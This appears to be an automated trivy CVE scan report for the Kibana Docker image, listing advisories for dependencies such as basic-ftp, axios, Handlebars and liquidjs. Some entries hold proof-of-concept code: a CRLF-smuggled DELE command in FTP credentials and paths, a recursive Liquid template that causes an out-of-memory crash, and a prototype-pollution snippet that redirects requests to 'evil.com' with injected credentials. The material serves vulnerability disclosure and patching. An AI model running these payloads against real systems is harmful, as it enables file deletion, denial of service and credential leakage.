Kibana Docker Image CVE Report
Back to Overview

We use trivy to scan the Docker image for CVEs. The report is updated every Wednesday morning and Sunday evening.

Docker image: docker.elastic.co/kibana/kibana

Last updated: 2026-05-06T07:07:42.353180

CVE IDDescriptionSeverityCVSS ScoreAffected VersionsNot Affected Versions
CVE-2026-41242protobufjs compiles protobuf definitions into JavaScript (JS) functions. In versions prior to 8.0.1 and 7.5.5, attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition. Versions 8.0.1 and 7.5.5 patch the issue.CRITICAL

NVD: 9.8

RedHat: 8.8

  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 9.3.0
  • 9.4.0
  • 8.19.15
  • 8.3.3
  • 8.3.2
  • 8.3.1
CVE-2026-33937Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, `Handlebars.compile()` accepts a pre-parsed AST object in addition to a template string. The `value` field of a `NumberLiteral` AST node is emitted directly into the generated JavaScript without quoting or sanitization. An attacker who can supply a crafted AST to `compile()` can therefore inject and execute arbitrary JavaScript, leading to Remote Code Execution on the server. Version 4.7.9 fixes the issue. Some workarounds are available. Validate input type before calling `Handlebars.compile()`; ensure the argument is always a `string`, never a plain object or JSON-deserialized value. Use the Handlebars runtime-only build (`handlebars/runtime`) on the server if templates are pre-compiled at build time; `compile()` will be unavailable.CRITICAL

NVD: n/a

RedHat: 9.8

  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 9.3.0
  • 9.2.8
  • 9.4.0
  • 9.3.4
  • 8.19.15
CVE-2026-27699The `basic-ftp` FTP client library for Node.js contains a path traversal vulnerability (CWE-22) in versions prior to 5.2.0 in the `downloadToDir()` method. A malicious FTP server can send directory listings with filenames containing path traversal sequences (`../`) that cause files to be written outside the intended download directory. Version 5.2.0 patches the issue.CRITICAL

NVD: 9.8

RedHat: 7.5

  • 9.3.1
  • 9.3.0
  • 9.2.6
  • 9.2.5
  • 9.2.4
  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.2.8
CVE-2026-25896fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. From 4.1.3to before 5.3.5, a dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (<, >, &, ", ') with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered. This vulnerability is fixed in 5.3.5.CRITICAL

NVD: n/a

RedHat: 7.1

  • 9.3.0
  • 9.2.5
  • 9.2.4
  • 9.2.3
  • 9.2.2
  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
CVE-2025-7783Use of Insufficiently Random Values vulnerability in form-data allows HTTP Parameter Pollution (HPP). This vulnerability is associated with program files lib/form_data.Js. This issue affects form-data: < 2.5.4, 3.0.0 - 3.0.3, 4.0.0 - 4.0.3.CRITICAL

NVD: n/a

RedHat: 5.4

  • 9.0.4
  • 9.0.3
  • 9.0.2
  • 9.0.1
  • 9.0.0
  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
CVE-2023-36665"protobuf.js (aka protobufjs) 6.10.0 through 7.x before 7.2.5 allows Prototype Pollution, a different vulnerability than CVE-2022-25878. A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype by adding and overwriting its data and functions. Exploitation can involve: (1) using the function parse to parse protobuf messages on the fly, (2) loading .proto files by using load/loadSync functions, or (3) providing untrusted input to the functions ReflectionObject.setParsedOption and util.setProperty.CRITICAL

NVD: 9.8

RedHat: 8.6

  • 8.14.3
  • 8.14.2
  • 8.14.1
  • 8.14.0
  • 8.13.4
  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
CVE-2023-46233crypto-js is a JavaScript library of crypto standards. Prior to version 4.2.0, crypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and at least 1,300,000 times weaker than current industry standard. This is because it both defaults to SHA1, a cryptographic hash algorithm considered insecure since at least 2005, and defaults to one single iteration, a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to preimage and collision attacks. If used to protect passwords, the impact is high. If used to generate signatures, the impact is high. Version 4.2.0 contains a patch for this issue. As a workaround, configure crypto-js to use SHA256 with at least 250,000 iterations.CRITICAL

NVD: 9.1

RedHat: 9.1

  • 8.10.4
  • 8.10.3
  • 8.10.2
  • 8.10.1
  • 8.9.2
  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
CVE-2022-37601Prototype pollution vulnerability in function parseQuery in parseQuery.js in webpack loader-utils via the name variable in parseQuery.js. This affects all versions prior to 1.4.1 and 2.0.3.CRITICAL

NVD: 9.8

RedHat: 8.1

  • 8.3.3
  • 8.3.2
  • 8.3.1
  • 8.3.0
  • 8.2.3
  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
CVE-2021-44906Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).CRITICAL

NVD: 9.8

RedHat: 3.1

  • 8.1.1
  • 8.1.0
  • 8.0.1
  • 8.0.0
  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
CVE-2022-0686Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.8.CRITICAL

NVD: 9.1

RedHat: 9.1

  • 8.0.0
  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
CVE-2026-33845A flaw in GnuTLS DTLS handshake parsing allows malformed fragments with zero length and non-zero offset, leading to an integer underflow during reassembly and resulting in an out-of-bounds read. This issue is remotely exploitable and may cause information disclosure or denial of service.HIGH

NVD: 9.1

RedHat: 7.5

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 8.19.15
  • 8.19.14
  • 8.19.13
  • 8.19.12
  • 8.19.11
CVE-2026-33846A heap buffer overflow vulnerability exists in the DTLS handshake fragment reassembly logic of GnuTLS. The issue arises in merge_handshake_packet() where incoming handshake fragments are matched and merged based solely on handshake type, without validating that the message_length field remains consistent across all fragments of the same logical message. An attacker can exploit this by sending crafted DTLS fragments with conflicting message_length values, causing the implementation to allocate a buffer based on a smaller initial fragment and subsequently write beyond its bounds using larger, inconsistent fragments. Because the merge operation does not enforce proper bounds checking against the allocated buffer size, this results in an out-of-bounds write on the heap. The vulnerability is remotely exploitable without authentication via the DTLS handshake path and can lead to application crashes or potential memory corruption.HIGH

NVD: n/a

RedHat: 7.5

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 8.19.15
  • 8.19.14
  • 8.19.13
  • 8.19.12
  • 8.19.11
CVE-2026-40356In MIT Kerberos 5 (aka krb5) before 1.22.3, there is an integer underflow and resultant out-of-bounds read if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, possibly causing the process to terminate in parse_message.HIGH

NVD: n/a

RedHat: 5.9

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 8.19.15
  • 8.19.14
  • 8.19.13
  • 8.19.12
  • 8.19.11
CVE-2026-4878A flaw was found in libcap. A local unprivileged user can exploit a Time-of-check-to-time-of-use (TOCTOU) race condition in the `cap_set_file()` function. This allows an attacker with write access to a parent directory to redirect file capability updates to an attacker-controlled file. By doing so, capabilities can be injected into or stripped from unintended executables, leading to privilege escalation.HIGH

NVD: 7

RedHat: 6.7

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 8.18.2
  • 8.18.1
  • 8.18.0
  • 8.17.7
  • 8.17.6
CVE-2026-22020No description is available for this CVE.HIGH

NVD: n/a

RedHat: 7.1

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 8.19.15
  • 8.19.14
  • 8.19.13
  • 8.19.12
  • 8.19.11
CVE-2026-41324basic-ftp is an FTP client for Node.js. Versions prior to 5.3.0 are vulnerable to denial of service through unbounded memory growth while processing directory listings from a remote FTP server. A malicious or compromised server can send an extremely large or never-ending listing response to `Client.list()`, causing the client process to consume memory until it becomes unstable or crashes. Version 5.3.0 fixes the issue.HIGH

NVD: n/a

RedHat: 5.9

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 8.10.2
  • 8.10.1
  • 8.9.2
  • 8.9.1
  • 8.9.0
GHSA-6v7q-wjvx-w8wg## Summary basic-ftp's CRLF injection protection (added in commit 2ecc8e2 for GHSA-chqc-8p9q-pq6q) is incomplete. Two code paths bypass the `protectWhitespace()` control character check: (1) the `login()` method directly concatenates user-supplied credentials into USER/PASS FTP commands without any validation, and (2) the `_openDir()` method sends an MKD command before `cd()` invokes `protectWhitespace()`, creating a TOCTOU bypass. Both vectors allow an attacker who controls input to inject arbitrary FTP commands into the control connection. ## Details ### Vector 1: Credential Injection (login) The `login()` method constructs FTP commands by direct string concatenation with no CRLF validation: ```typescript // src/Client.ts:216-231 login(user = "anonymous", password = "guest"): Promise<FTPResponse> { this.ftp.log(`Login security: ${describeTLS(this.ftp.socket)}`) return this.ftp.handle("USER " + user, (res, task) => { // Line 218: no validation on `user` // ... else if (res.code === 331) { this.ftp.send("PASS " + password) // Line 226: no validation on `password` } }) } ``` `FtpContext.send()` writes directly to the TCP socket: ```typescript // src/FtpContext.ts:223-227 send(command: string) { // ... this._socket.write(command + "\r\n", this.encoding) } ``` The `protectWhitespace()` method (line 762) rejects `\r`, `\n`, and `\0` characters — but it is only called for path-based operations. Credentials never pass through it. The public `access()` method (line 268) passes `options.user` and `options.password` directly to `login()` with no sanitization. ### Vector 2: MKD TOCTOU Bypass (_openDir) The `_openDir()` method sends an MKD command before the CRLF check in `cd()`: ```typescript // src/Client.ts:745-748 protected async _openDir(dirName: string) { await this.sendIgnoringError("MKD " + dirName) // Line 746: sent BEFORE validation await this.cd(dirName) // Line 747: protectWhitespace() called here — too late } ``` This is called from `ensureDir()` (line 729) which splits a user-supplied remote path by `/` and passes each fragment to `_openDir()`, and from `_uploadToWorkingDir()` (line 679) which passes local directory names read from the filesystem. ## PoC ### Vector 1: Credential Injection ```javascript const ftp = require("basic-ftp"); async function exploit() { const client = new ftp.Client(); client.ftp.verbose = true; // Connect to target FTP server await client.access({ host: "target-ftp-server", port: 21, // Username contains CRLF + injected DELE command user: "anonymous\r\nDELE important.txt", password: "guest" }); // Server receives on the wire: // USER anonymous\r\n // DELE important.txt\r\n // PASS guest\r\n // The DELE command executes before PASS is processed client.close(); } exploit(); ``` ### Vector 2: MKD TOCTOU Bypass ```javascript const ftp = require("basic-ftp"); async function exploit() { const client = new ftp.Client(); client.ftp.verbose = true; await client.access({ host: "target-ftp-server", user: "anonymous", password: "guest" }); // Path fragment with CRLF — MKD is sent before cd() validates try { await client.ensureDir("test\r\nDELE important.txt/subdir"); } catch (e) { // cd() throws after protectWhitespace() rejects, but MKD + DELE already sent } // Server received: // MKD test\r\n // DELE important.txt\r\n // CWD test\r\n <-- this may fail, but damage is done client.close(); } exploit(); ``` ## Impact An attacker who controls credentials or remote paths passed to basic-ftp can inject arbitrary FTP commands into the control connection. This enables: - **File deletion**: Inject `DELE` commands to remove files on the FTP server - **File manipulation**: Inject `RNFR`/`RNTO` to rename files, `MKD`/`RMD` to create/remove directories - **Server commands**: Inject `SITE` commands (e.g., `SITE CHMOD`) to change permissions - **Session hijacking**: Inject `USER`/`PASS` to re-authenticate as a different user The credential injection vector (Vector 1) is particularly dangerous because it occurs before authentication, meaning the injected commands execute with whatever default permissions the server grants during the login handshake. Applications that accept user-supplied FTP credentials (e.g., web-based file managers, backup tools, deployment systems) are directly vulnerable. ## Recommended Fix Add CRLF validation to both code paths: **1. Validate credentials in `login()`:** ```typescript // src/Client.ts:216 login(user = "anonymous", password = "guest"): Promise<FTPResponse> { if (/[\r\n\0]/.test(user) || /[\r\n\0]/.test(password)) { return Promise.reject(new Error("Invalid credentials: Contains control characters")); } this.ftp.log(`Login security: ${describeTLS(this.ftp.socket)}`) return this.ftp.handle("USER " + user, (res, task) => { // ... rest unchanged }) } ``` **2. Validate dirName in `_openDir()` before sending MKD:** ```typescript // src/Client.ts:745 protected async _openDir(dirName: string) { if (/[\r\n\0]/.test(dirName)) { throw new Error("Invalid path: Contains control characters"); } await this.sendIgnoringError("MKD " + dirName) await this.cd(dirName) } ``` Alternatively, centralize CRLF validation in `FtpContext.send()` so that all FTP commands are protected regardless of the calling code path.HIGH

NVD: n/a

RedHat: n/a

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 8.10.2
  • 8.10.1
  • 8.9.2
  • 8.9.1
  • 8.9.0
CVE-2026-41311### Summary A circular block reference in `{% layout %}` / `{% block %}` causes an infinite recursive loop, consuming all available memory (~4GB) and crashing the Node.js process with `FATAL ERROR: JavaScript heap out of memory`. This allows any user who can submit a Liquid template to perform a Denial of Service attack. ### Details In `src/tags/block.ts`, during OUTPUT mode, each block looks up its render function from `ctx.getRegister('blocks')[this.block]`. When a block with name `a` is nested inside another block also named `a` in a child template, the inner block finds the outer block's render function and calls it. The outer block's templates contain the inner block again, creating infinite recursion with no termination condition. Relevant code (`src/tags/block.ts`, `getBlockRender` method): ```typescript private getBlockRender (ctx: Context) { const { liquid, templates } = this const renderChild = ctx.getRegister('blocks')[this.block] const renderCurrent = function * (superBlock: BlockDrop, emitter: Emitter) { ctx.push({ block: superBlock }) yield liquid.renderer.renderTemplates(templates, ctx, emitter) ctx.pop() } return renderChild ? (superBlock: BlockDrop, emitter: Emitter) => renderChild( new BlockDrop( (emitter: Emitter) => renderCurrent(superBlock, emitter) ), emitter) : renderCurrent } ``` When `renderChild` exists (same-name block found), it calls `renderChild` which re-renders templates containing the nested block, which again finds `renderChild`, and so on — infinite loop. ### PoC **1. Create a layout file** (`layout.html`): ```liquid <header>{% block a %}default-a{% endblock %}</header> <main>{% block b %}default-b{% endblock %}</main> <footer>{% block c %}default-c{% endblock %}</footer> ``` **2. Create a template that uses the layout:** ```liquid {% layout "layout" %} {% block a %}outer-a {% block a %}inner-a{% endblock %}{% endblock %} {% block b %}content-b{% endblock %} {% block c %}content-c{% endblock %} ``` **3. Render:** ```javascript const { Liquid } = require('liquidjs') const liquid = new Liquid({ root: './', extname: '.html' }) liquid.renderFile('template').then(console.log) // Result: process hangs, memory grows to ~4GB, then crashes with OOM ``` The anonymous block variant also triggers the same issue: ```liquid {% layout "parent" %} {%block%}A{%block%}B{%endblock%}{%endblock%} ``` ### Impact **Denial of Service (DoS).** Any application that accepts user-provided or user-influenced Liquid templates — such as CMS platforms, email template builders, multi-tenant SaaS products, or static site generators with untrusted input — can be crashed by a single malicious template. The attack requires no authentication beyond the ability to submit a template, and no special configuration. The Node.js process is killed by the OS due to memory exhaustion, causing complete service disruption.HIGH

NVD: n/a

RedHat: n/a

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 9.2.8
  • 9.2.7
  • 9.2.6
  • 9.2.5
  • 9.2.4
CVE-2026-4800Impact: The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function(). Patches: Users should upgrade to version 4.18.0. Workarounds: Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.HIGH

NVD: 9.8

RedHat: 8.1

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
    CVE-2026-26280systeminformation is a System and OS information library for node.js. In versions prior to 5.30.8, a command injection vulnerability in the `wifiNetworks()` function allows an attacker to execute arbitrary OS commands via an unsanitized network interface parameter in the retry code path. In `lib/wifi.js`, the `wifiNetworks()` function sanitizes the `iface` parameter on the initial call (line 437). However, when the initial scan returns empty results, a `setTimeout` retry (lines 440-441) calls `getWifiNetworkListIw(iface)` with the **original unsanitized** `iface` value, which is passed directly to `execSync('iwlist ${iface} scan')`. Any application passing user-controlled input to `si.wifiNetworks()` is vulnerable to arbitrary command execution with the privileges of the Node.js process. Version 5.30.8 fixes the issue.HIGH

    NVD: 7.8

    RedHat: 8.4

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.0.4
    • 9.0.3
    • 9.0.2
    • 9.0.1
    • 9.0.0
    CVE-2026-26318systeminformation is a System and OS information library for node.js. Versions prior to 5.31.0 are vulnerable to command injection via unsanitized `locate` output in `versions()`. Version 5.31.0 fixes the issue.HIGH

    NVD: n/a

    RedHat: 8.8

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.0.4
    • 9.0.3
    • 9.0.2
    • 9.0.1
    • 9.0.0
    CVE-2026-42033Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, when Object.prototype has been polluted by any co-dependency with keys that axios reads without a hasOwnProperty guard, an attacker can (a) silently intercept and modify every JSON response before the application sees it, or (b) fully hijack the underlying HTTP transport, gaining access to request credentials, headers, and body. The precondition is prototype pollution from a separate source in the same process. This vulnerability is fixed in 1.15.1 and 0.31.1.HIGH

    NVD: n/a

    RedHat: 7.4

    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    CVE-2026-42035Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, a prototype pollution gadget exists in the Axios HTTP adapter (lib/adapters/http.js) that allows an attacker to inject arbitrary HTTP headers into outgoing requests. The vulnerability exploits duck-type checking of the data payload, where if Object.prototype is polluted with getHeaders, append, pipe, on, once, and Symbol.toStringTag, Axios misidentifies any plain object payload as a FormData instance and calls the attacker-controlled getHeaders() function, merging the returned headers into the outgoing request. The vulnerable code resides exclusively in lib/adapters/http.js. The prototype pollution source does not need to originate from Axios itself — any prototype pollution primitive in any dependency in the application's dependency tree is sufficient to trigger this gadget. This vulnerability is fixed in 1.15.1 and 0.31.1.HIGH

    NVD: n/a

    RedHat: 7.4

    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    CVE-2026-42043Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, an attacker who can influence the target URL of an Axios request can use any address in the 127.0.0.0/8 range (other than 127.0.0.1) to completely bypass the NO_PROXY protection. This vulnerability is due to an incomplete for CVE-2025-62718, This vulnerability is fixed in 1.15.1 and 0.31.1.HIGH

    NVD: 10

    RedHat: n/a

    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    CVE-2026-42264## Summary Five config properties in the HTTP adapter are read via direct property access without `hasOwnProperty` guards, making them exploitable as prototype pollution gadgets. When `Object.prototype` is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request. ## Affected Properties 1. **`config.auth`** (`lib/adapters/http.js` line 617) Injects attacker-controlled `Authorization` header on all requests. 2. **`config.baseURL`** (`lib/helpers/resolveConfig.js` line 18) Redirects all requests using relative URLs to an attacker-controlled server. 3. **`config.socketPath`** (`lib/adapters/http.js` line 669) Redirects requests to internal Unix sockets (e.g. Docker daemon). 4. **`config.beforeRedirect`** (`lib/adapters/http.js` line 698) Executes attacker-supplied callback during HTTP redirects. 5. **`config.insecureHTTPParser`** (`lib/adapters/http.js` line 712) Enables Node.js insecure HTTP parser on all requests. ## Proof of Concept ```javascript const axios = require('axios'); // Prototype pollution from a vulnerable dependency in the same process Object.prototype.auth = { username: 'attacker', password: 'exfil' }; Object.prototype.baseURL = 'https://evil.com'; await axios.get('/api/users'); // Request is sent to: https://evil.com/api/users // With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw= // Attacker receives both the request and injected credentials ``` ## Impact - **Credential injection:** Every axios request includes an attacker-controlled `Authorization` header, leaking request contents to any server that logs auth headers. - **Request hijacking:** All requests using relative URLs are silently redirected to an attacker-controlled server. - **SSRF:** Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments. - **Code execution:** Attacker-supplied functions execute during HTTP redirects. - **Parser weakening:** Insecure HTTP parser enabled on all requests, enabling request smuggling. ## Root Cause `mergeConfig()` iterates `Object.keys({...config1, ...config2})`, which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (`config.auth`, `config.socketPath`, etc.), which traverses the prototype chain and picks up polluted values. The `own()` helper at `lib/adapters/http.js` line 336 exists and guards 8 other properties (`data`, `lookup`, `family`, `httpVersion`, `http2Options`, `responseType`, `responseEncoding`, `transport`) from this exact attack. The 5 properties listed above are not included in this protection. ## Suggested Fix Apply the existing `own()` helper to all affected properties: ```javascript const configAuth = own('auth'); if (configAuth) { const username = configAuth.username || ''; const password = configAuth.password || ''; auth = username + ':' + password; } ``` Same pattern for `socketPath`, `beforeRedirect`, `insecureHTTPParser`, and a `hasOwnProperty` check for `baseURL` in `resolveConfig.js`.HIGH

    NVD: n/a

    RedHat: n/a

    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    • 8.9.2
    • 8.9.1
    • 8.9.0
    • 8.8.2
    CVE-2026-4786Mitgation of CVE-2026-4519 was incomplete. If the URL contained "%action" the mitigation could be bypassed for certain browser types the "webbrowser.open()" API could have commands injected into the underlying shell. See CVE-2026-4519 for details.HIGH

    NVD: n/a

    RedHat: 7.1

    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    CVE-2026-6100Use-after-free (UAF) was possible in the `lzma.LZMADecompressor`, `bz2.BZ2Decompressor`, and `gzip.GzipFile` when a memory allocation fails with a `MemoryError` and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition. The vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a `MemoryError` is raised during decompression. Using the helper functions to one-shot decompress data such as `lzma.decompress()`, `bz2.decompress()`, `gzip.decompress()`, and `zlib.decompress()` are not affected as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.HIGH

    NVD: n/a

    RedHat: 8.1

    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    CVE-2026-1526The undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a "decompression bomb") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive. The vulnerability exists in the PerMessageDeflate.decompress() method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    • 8.19.15
    CVE-2026-1528ImpactA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process. Patches Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    • 8.19.15
    • 8.14.3
    • 8.14.2
    • 8.14.1
    CVE-2026-2229ImpactThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the server_max_window_bits parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range server_max_window_bits value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination. The vulnerability exists because: * The isValidClientWindowBits() function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15 * The createInflateRaw() call is not wrapped in a try-catch block * The resulting exception propagates up through the call stack and crashes the Node.js processHIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    • 8.19.15
    CVE-2026-4424A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    • 8.19.14
    • 8.19.13
    CVE-2026-4519The webbrowser.open() API would accept leading dashes in the URL which could be handled as command line options for certain web browsers. New behavior rejects leading dashes. Users are recommended to sanitize URLs prior to passing to webbrowser.open().HIGH

    NVD: 3.3

    RedHat: 7.1

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    • 8.19.14
    • 8.19.13
    CVE-2026-35213@hapi/content provided HTTP Content-* headers parsing. All versions of @hapi/content through 6.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via crafted HTTP header values. Three regular expressions used to parse Content-Type and Content-Disposition headers contain patterns susceptible to catastrophic backtracking. This vulnerability is fixed in 6.0.1.HIGH

    NVD: 7.5

    RedHat: n/a

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    CVE-2026-39983basic-ftp is an FTP client for Node.js. Prior to 5.2.1, basic-ftp allows FTP command injection via CRLF sequences (\r\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library's protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \r\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands. This vulnerability is fixed in 5.2.1.HIGH

    NVD: n/a

    RedHat: 8.6

    • 9.3.3
    • 9.3.2
    • 9.2.8
    • 9.2.7
    • 8.19.14
    • 9.4.0
    • 9.3.4
    • 9.3.1
    • 9.3.0
    • 9.2.6
    CVE-2026-33938Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the `@partial-block` special variable is stored in the template data context and is reachable and mutable from within a template via helpers that accept arbitrary objects. When a helper overwrites `@partial-block` with a crafted Handlebars AST, a subsequent invocation of `{{> @partial-block}}` compiles and executes that AST, enabling arbitrary JavaScript execution on the server. Version 4.7.9 fixes the issue. Some workarounds are available. First, use the runtime-only build (`require('handlebars/runtime')`). The `compile()` method is absent, eliminating the vulnerable fallback path. Second, audit registered helpers for any that write arbitrary values to context objects. Helpers should treat context data as read-only. Third, avoid registering helpers from third-party packages (such as `handlebars-helpers`) in contexts where templates or context data can be influenced by untrusted input.HIGH

    NVD: n/a

    RedHat: 8.1

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    CVE-2026-33939Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, when a Handlebars template contains decorator syntax referencing an unregistered decorator (e.g. `{{*n}}`), the compiled template calls `lookupProperty(decorators, "n")`, which returns `undefined`. The runtime then immediately invokes the result as a function, causing an unhandled `TypeError: ... is not a function` that crashes the Node.js process. Any application that compiles user-supplied templates without wrapping the call in a `try/catch` is vulnerable to a single-request Denial of Service. Version 4.7.9 fixes the issue. Some workarounds are available. Wrap compilation and rendering in `try/catch`. Validate template input before passing it to `compile()`; reject templates containing decorator syntax (`{{*...}}`) if decorators are not used in your application. Use the pre-compilation workflow; compile templates at build time and serve only pre-compiled templates; do not call `compile()` at request time.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    CVE-2026-33940Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, a crafted object placed in the template context can bypass all conditional guards in `resolvePartial()` and cause `invokePartial()` to return `undefined`. The Handlebars runtime then treats the unresolved partial as a source that needs to be compiled, passing the crafted object to `env.compile()`. Because the object is a valid Handlebars AST containing injected code, the generated JavaScript executes arbitrary commands on the server. The attack requires the adversary to control a value that can be returned by a dynamic partial lookup. Version 4.7.9 fixes the issue. Some workarounds are available. First, use the runtime-only build (`require('handlebars/runtime')`). Without `compile()`, the fallback compilation path in `invokePartial` is unreachable. Second, sanitize context data before rendering: Ensure no value in the context is a non-primitive object that could be passed to a dynamic partial. Third, avoid dynamic partial lookups (`{{> (lookup ...)}}`) when context data is user-controlled.HIGH

    NVD: n/a

    RedHat: 8.1

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
